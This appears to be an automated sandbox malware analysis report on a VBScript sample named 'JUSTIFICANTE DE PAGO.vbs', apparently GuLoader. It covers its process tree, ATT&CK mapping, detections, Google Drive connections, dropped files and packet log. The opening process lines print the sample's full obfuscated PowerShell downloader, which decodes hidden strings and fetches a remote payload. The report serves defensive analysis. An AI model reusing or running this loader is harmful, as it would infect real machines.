Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Somesthesia.Ske && echo $"Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$spiritusestes = 1;$civilisationen='substrin';$civilisationen+='g';function ulnage($roadless){$havnebassinet=$roadless.length-$spiritusestes;for($kuldeblgerne=5; $kuldeblgerne -lt $havnebassinet; $kuldeblgerne+=(6)){$anthracolithic+=$roadless.$civilisationen.invoke($kuldeblgerne, $spiritusestes);}$anthracolithic;}function multiplikatorernes($fngsledes){. ($tythed) ($fngsledes);}$unlogged=ulnage '.ceanmskalaob silz an.oitimeblradiolbevisaunflu/broom5cacod.engen0ba.dh oplsn(bu,gawenligibilspnemireddatafo r,mow unins oilo kab.lnsalontbr.kk anac1 lom0 kret. litu0plagi;total ing.awviz.ri egalncarci6f,ske4c rru;robus bidrax grou6,kaer4arve ;ek,am fodfsr luntv bene:heme,1 t,lm2m end1maend.progr0 un.e)predr trangplatfeekspacspr skcreamo tect/ stan2vask.0 midw1 lecy0opskr0perso1 tilr0eksam1etabl ka.kefinteri rgelr lucieknoerfassobo f.rtxeleme/esthe1nnned2allia1anmel.frede0galip ';$zootechnician=ulnage 'ubrudubermusko,ere,kiderbusti- tramaamitigggerdeweaponbe,tmtconv ';$blikdaases93=ulnage ' .etrh necttgrimitkashipjustsssnerp:manaf/ udbl/i ddadfarverinkasidegorv,xploem,sra..kyftgcapo ofantooguignga.tralblk pealler..ntrac subdo cha melpid/elendutailocrek.m?censuecontexfemetpvebogobill.rchastt form=asymmd fun.omikrowtransnvirtulforstofoliaa syklda aly& railiabri dtilfa=overf1 polykcozenxgretet ndemnpr.starotato eftexdoegll sekljhypotpbruskhwoodbfretracs.inda sa.mv chucso.ympldataeydise.x nyt.vpersooudloelin.erdov.rs7,alelhenleauundubhenleah bukskbimlecalarmjforv.xvidsy ';$timbalernes=ulnage 'pa,ie> read ';$tythed=ulnage ' vermist,tset,lsjxtyde. ';$conidium='historicize';multiplikatorernes (ulnage 'p,psisvlteneslnggtmeteo-filr c wil oklaptn lym.treinsezincenmyliut fu.d hemic-spisep n.nrap.robtchickh.onde ugentop ev:retab\sydafv rummipsychcrettea .amirstrmp.kro.stb,bylxupliftled n a.rom-biogrvcaramatekstlser,iupelseedingt dy de$rullecma ero seminimpliirampidletpai gn.du spanmv.jto;.nher ');multiplikatorernes (ulnage ' hizaiu skifunme, twelv(est at dekoe ngodssjlert micr-tomatpengjaatingetcharthbusre aakantbaloc:boghy\landzvfumeripremoc ko,sasitcor,alsa.swotttaftgtx casit depo)forbr{d.mpvegeorgxneuroi escatrest.}bermm;ptsa, ');$germind = ulnage 'cledge swatcswingh strao.deli trin%backsa pincpklamppbelbsdkvadrareflet mi mavolut%sqush\de,ersg mmioforetmampliearchesbol,gtremsehmicr.efejl sinconispiriaboros.m,resst,nerktypiseod.rl pella&ti sm& hall be pee n.ttcsawbohnontiodepre fraso$incor ';multiplikatorernes (ulnage 'domin$ .tolgstje lin,oroskarpbmut nablo,llst ig:cerasn muniuomplal granipluggnkanoedunmelkkarbuoh.rdemtaws.sfolketfr.dres,urrnmotte=jrgen(p.eudcdebr.mi,cludvrks. ommis/mastec foli te.n$amesigmoolee deicr.ninnm,seudifi,kon bankd m.te)ratla ');multiplikatorernes (ulnage 'metop$h.insglgeguljulefotrg,ebf.rmuaforteldek.i:endomppost.cjvn,aeteglbrno ennkontrekant,=kia.c$cu geb skralungkaicamankass,cd yorkafla,kasa.ansalmineplumbs
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$spiritusestes = 1;$civilisationen='substrin';$civilisationen+='g';function ulnage($roadless){$havnebassinet=$roadless.length-$spiritusestes;for($kuldeblgerne=5; $kuldeblgerne -lt $havnebassinet; $kuldeblgerne+=(6)){$anthracolithic+=$roadless.$civilisationen.invoke($kuldeblgerne, $spiritusestes);}$anthracolithic;}function multiplikatorernes($fngsledes){. ($tythed) ($fngsledes);}$unlogged=ulnage '.ceanmskalaob silz an.oitimeblradiolbevisaunflu/broom5cacod.engen0ba.dh oplsn(bu,gawenligibilspnemireddatafo r,mow unins oilo kab.lnsalontbr.kk anac1 lom0 kret. litu0plagi;total ing.awviz.ri egalncarci6f,ske4c rru;robus bidrax grou6,kaer4arve ;ek,am fodfsr luntv bene:heme,1 t,lm2m end1maend.progr0 un.e)predr trangplatfeekspacspr skcreamo tect/ stan2vask.0 midw1 lecy0opskr0perso1 tilr0eksam1etabl ka.kefinteri rgelr lucieknoerfassobo f.rtxeleme/esthe1nnned2allia1anmel.frede0galip ';$zootechnician=ulnage 'ubrudubermusko,ere,kiderbusti- tramaamitigggerdeweaponbe,tmtconv ';$blikdaases93=ulnage ' .etrh necttgrimitkashipjustsssnerp:manaf/ udbl/i ddadfarverinkasidegorv,xploem,sra..kyftgcapo ofantooguignga.tralblk pealler..ntrac subdo cha melpid/elendutailocrek.m?censuecontexfemetpvebogobill.rchastt form=asymmd fun.omikrowtransnvirtulforstofoliaa syklda aly& railiabri dtilfa=overf1 polykcozenxgretet ndemnpr.starotato eftexdoegll sekljhypotpbruskhwoodbfretracs.inda sa.mv chucso.ympldataeydise.x nyt.vpersooudloelin.erdov.rs7,alelhenleauundubhenleah bukskbimlecalarmjforv.xvidsy ';$timbalernes=ulnage 'pa,ie> read ';$tythed=ulnage ' vermist,tset,lsjxtyde. ';$conidium='historicize';multiplikatorernes (ulnage 'p,psisvlteneslnggtmeteo-filr c wil oklaptn lym.treinsezincenmyliut fu.d hemic-spisep n.nrap.robtchickh.onde ugentop ev:retab\sydafv rummipsychcrettea .amirstrmp.kro.stb,bylxupliftled n a.rom-biogrvcaramatekstlser,iupelseedingt dy de$rullecma ero seminimpliirampidletpai gn.du spanmv.jto;.nher ');multiplikatorernes (ulnage ' hizaiu skifunme, twelv(est at dekoe ngodssjlert micr-tomatpengjaatingetcharthbusre aakantbaloc:boghy\landzvfumeripremoc ko,sasitcor,alsa.swotttaftgtx casit depo)forbr{d.mpvegeorgxneuroi escatrest.}bermm;ptsa, ');$germind = ulnage 'cledge swatcswingh strao.deli trin%backsa pincpklamppbelbsdkvadrareflet mi mavolut%sqush\de,ersg mmioforetmampliearchesbol,gtremsehmicr.efejl sinconispiriaboros.m,resst,nerktypiseod.rl pella&ti sm& hall be pee n.ttcsawbohnontiodepre fraso$incor ';multiplikatorernes (ulnage 'domin$ .tolgstje lin,oroskarpbmut nablo,llst ig:cerasn muniuomplal granipluggnkanoedunmelkkarbuoh.rdemtaws.sfolketfr.dres,urrnmotte=jrgen(p.eudcdebr.mi,cludvrks. ommis/mastec foli te.n$amesigmoolee deicr.ninnm,seudifi,kon bankd m.te)ratla ');multiplikatorernes (ulnage 'metop$h.insglgeguljulefotrg,ebf.rmuaforteldek.i:endomppost.cjvn,aeteglbrno ennkontrekant,=kia.c$cu geb skralungkaicamankass,cd yorkafla,kasa.ansalmineplumbsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information221
Scripting		Valid Accounts11
Command and Scripting Interpreter		221
Scripting		11
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Exploitation for Client Execution		1
DLL Side-Loading		1
DLL Side-Loading		21
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
PowerShell		Logon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
JUSTIFICANTE DE PAGO.vbs21%ReversingLabsScript-WScript.Trojan.Guloader
JUSTIFICANTE DE PAGO.vbs8%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
https://go.micro0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://drive.usercontent.googh0%Avira URL Cloudsafe
https://drive.googP0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
drive.google.com
142.250.101.100
truefalse
    		high
    drive.usercontent.google.com
    		142.251.2.132
    		truefalse
      		high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://www.google.compowershell.exe, 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1801801088.000001FF6DAB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://drive.usercontent.google.compowershell.exe, 00000001.00000002.1781635386.000001FF5FB24000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmptrue
            • URL Reputation: malware
            • URL Reputation: malware
            		unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://go.micropowershell.exe, 00000001.00000002.1781635386.000001FF5ECD1000.00000004.00000800.00020000.00000000.sdmptrue
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://contoso.com/powershell.exe, 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1801801088.000001FF6DAB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://contoso.com/Licensepowershell.exe, 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                https://contoso.com/Iconpowershell.exe, 00000001.00000002.1801801088.000001FF6D974000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://drive.googPpowershell.exe, 00000001.00000002.1781635386.000001FF5FAE6000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://drive.google.compowershell.exe, 00000001.00000002.1781635386.000001FF5F936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://drive.usercontent.googhpowershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://drive.usercontent.google.compowershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE3D000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://drive.google.compowershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://aka.ms/pscore68powershell.exe, 00000001.00000002.1781635386.000001FF5D901000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://apis.google.compowershell.exe, 00000001.00000002.1781635386.000001FF5DE20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DE39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5DEA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FB0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1781635386.000001FF5FAEB000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1781635386.000001FF5D901000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1781635386.000001FF5DB28000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              142.251.2.132
                              		drive.usercontent.google.comUnited States
                              		15169GOOGLEUSfalse
                              142.250.101.100
                              		drive.google.comUnited States
                              		15169GOOGLEUSfalse

                              General Information

                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1430768
                              Start date and time:2024-04-24 07:01:08 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 3m 22s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:7
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:JUSTIFICANTE DE PAGO.vbs
                              Detection:MAL
                              Classification:mal100.expl.evad.winVBS@6/4@2/2
                              EGA Information:Failed
                              HCA Information:
                              • Successful, ratio: 75%
                              • Number of executed functions: 4
                              • Number of non-executed functions: 1
                              Cookbook Comments:
                              • Found application associated with file extension: .vbs
                              • Stop behavior analysis, all processes terminated

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target powershell.exe, PID 7348 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              07:01:59API Interceptor43x Sleep call for process: powershell.exe modified

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASNs

                              No context

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              3b5074b1b5d032e5620f69f9f700ff0eorden de compra.vbsGet hashmaliciousAgentTeslaBrowse
                              • 142.251.2.132
                              • 142.250.101.100
                              FT. 40FE CNY .xlsx.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                              • 142.251.2.132
                              • 142.250.101.100
                              DHL Shipping doc.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                              • 142.251.2.132
                              • 142.250.101.100
                              G4-TODOS.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                              • 142.251.2.132
                              • 142.250.101.100
                              Reconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                              • 142.251.2.132
                              • 142.250.101.100
                              purchase order pdf.exeGet hashmaliciousAgentTeslaBrowse
                              • 142.251.2.132
                              • 142.250.101.100
                              PO 23JC0704-Rollease-B.exeGet hashmaliciousAgentTeslaBrowse
                              • 142.251.2.132
                              • 142.250.101.100
                              3Shape Unite Installer.exeGet hashmaliciousUnknownBrowse
                              • 142.251.2.132
                              • 142.250.101.100
                              ScreenConnect.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                              • 142.251.2.132
                              • 142.250.101.100
                              ScreenConnect.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                              • 142.251.2.132
                              • 142.250.101.100

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):64
                              Entropy (8bit):1.1940658735648508
                              Encrypted:false
                              SSDEEP:3:Nlllul/nq/llh:NllUyt
                              MD5:AB80AD9A08E5B16132325DF5584B2CBE
                              SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                              SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                              SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:@...e................................................@..........

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22vcjhx5.fss.ps1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s5izzs1v.z2z.psm1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Roaming\Somesthesia.Ske

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, ASCII text, with very long lines (1692), with no line terminators
                              Category:dropped
                              Size (bytes):1692
                              Entropy (8bit):5.0933355420416335
                              Encrypted:false
                              SSDEEP:24:hazspvlvhXlhEG0qnXXX08Ucq9J8mZoWHMzj+cB7jTsoT9FyVZ81wmna:7pNmRq+fjsueFYaWJ
                              MD5:387CA26099C583D5E8857987F73D894B
                              SHA1:D1790C9613E35DD5F3AB26B04A898C01D1EED909
                              SHA-256:429FD395965858473A411E8B891F8541DAD7AC0032B2A18530AC913D68703F6D
                              SHA-512:59E0775A443645E98D2BAE03FD47F571BBBF76DD3B6B473234E49495C38AA34D7DBEC75FF6D1A1A153A0F0B79EACAE69034CB25AB75B2F138CCAEFD3F0AE4FA7
                              Malicious:false
                              Reputation:low
                              Preview:<!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="kr92az2NxjKdxQ-wnrkiNQ">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor:pointer}.goog-link-button-disabled{color:#ccc;text-decoration:none;cursor:default}body{color:#222;font:normal 13px/1.4 arial,sans-serif;margin:0}.grecaptcha-badge{visibility:hidden}.uc-main{padding-top:50px;text-align:center}#uc-dl-icon{display:inline-block;margin-top:16px;padding-right:1em;vertical-align:top}#uc-text{display:inline-block;max-width:68ex;text-align:left}.uc-error-caption,.uc-warning-caption{color:#222;font-size:16px}#uc-download-link{text-decoration:none}.uc-name-size a{color:#15c;text-decoration:none}.uc-name-size a:visited{color:#61c;text-decoration:none}.uc-name-size a:active{color:#d14836;text-decoration:none}.uc-footer{color:#777;font-size:11px;padding-bottom:5ex;padding-top:5ex;text-align:center}.uc-footer a{colo

                              Static File Info

                              General

                              File type:ASCII text, with very long lines (362), with CRLF line terminators
                              Entropy (8bit):5.341154719997299
                              TrID:
                              • Visual Basic Script (13500/0) 100.00%
                              File name:JUSTIFICANTE DE PAGO.vbs
                              File size:8'029 bytes
                              MD5:98cded86c15d6f27d03e1ff9443cc0a2
                              SHA1:aa7e6cf10ace8891de39a6340b62b84f15d39a98
                              SHA256:a2793f248743616fac792f8d191c26c9d65f63ff1016820508cbda367b906e24
                              SHA512:f6a5e5270da61eb94effab98504db101cacf8f4f333df8785592a9396bb545dc9ce675012b27975ccdf3ad5356c07d315fc187a71420524646d86c314860d24d
                              SSDEEP:192:49zZJJnQdvyVpIB0dAGech7YP0RngYYt4S04FOo/IVJGJL5vOe5y9drEa:KmYuS08n8ds9h
                              TLSH:94F1197EFF1A09680A431BD07CECC801BF18AE7F14E198A1BD2C1378F149099875ADC9
                              File Content Preview:.. ..Function Pignorate ......Ma6 = Ma6 & "$Spiritusestes = 1;$civilisationen='Substrin';$civilisationen+='g';Function Ulnage($Roadless){$Havnebassinet=$Roadless.Length-$Spiritusestes;For($Kuldeblgerne=5; $Kuldeblgerne -lt $Havnebassinet; $Kuldeblgerne+=(

                              File Icon

                              Icon Hash:68d69b8f86ab9a86

                              Network Behavior

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Apr 24, 2024 07:02:01.602437973 CEST49730443192.168.2.4142.250.101.100
                              Apr 24, 2024 07:02:01.602524996 CEST44349730142.250.101.100192.168.2.4
                              Apr 24, 2024 07:02:01.602617025 CEST49730443192.168.2.4142.250.101.100
                              Apr 24, 2024 07:02:01.610771894 CEST49730443192.168.2.4142.250.101.100
                              Apr 24, 2024 07:02:01.610810995 CEST44349730142.250.101.100192.168.2.4
                              Apr 24, 2024 07:02:01.977930069 CEST44349730142.250.101.100192.168.2.4
                              Apr 24, 2024 07:02:01.978013992 CEST49730443192.168.2.4142.250.101.100
                              Apr 24, 2024 07:02:01.979017973 CEST44349730142.250.101.100192.168.2.4
                              Apr 24, 2024 07:02:01.979073048 CEST49730443192.168.2.4142.250.101.100
                              Apr 24, 2024 07:02:01.990643024 CEST49730443192.168.2.4142.250.101.100
                              Apr 24, 2024 07:02:01.990660906 CEST44349730142.250.101.100192.168.2.4
                              Apr 24, 2024 07:02:01.991035938 CEST44349730142.250.101.100192.168.2.4
                              Apr 24, 2024 07:02:02.006874084 CEST49730443192.168.2.4142.250.101.100
                              Apr 24, 2024 07:02:02.048110962 CEST44349730142.250.101.100192.168.2.4
                              Apr 24, 2024 07:02:02.371623039 CEST44349730142.250.101.100192.168.2.4
                              Apr 24, 2024 07:02:02.371814013 CEST44349730142.250.101.100192.168.2.4
                              Apr 24, 2024 07:02:02.371885061 CEST49730443192.168.2.4142.250.101.100
                              Apr 24, 2024 07:02:02.373832941 CEST49730443192.168.2.4142.250.101.100
                              Apr 24, 2024 07:02:02.530298948 CEST49731443192.168.2.4142.251.2.132
                              Apr 24, 2024 07:02:02.530338049 CEST44349731142.251.2.132192.168.2.4
                              Apr 24, 2024 07:02:02.530550003 CEST49731443192.168.2.4142.251.2.132
                              Apr 24, 2024 07:02:02.530981064 CEST49731443192.168.2.4142.251.2.132
                              Apr 24, 2024 07:02:02.530991077 CEST44349731142.251.2.132192.168.2.4
                              Apr 24, 2024 07:02:02.896086931 CEST44349731142.251.2.132192.168.2.4
                              Apr 24, 2024 07:02:02.896349907 CEST49731443192.168.2.4142.251.2.132
                              Apr 24, 2024 07:02:02.899142027 CEST49731443192.168.2.4142.251.2.132
                              Apr 24, 2024 07:02:02.899147034 CEST44349731142.251.2.132192.168.2.4
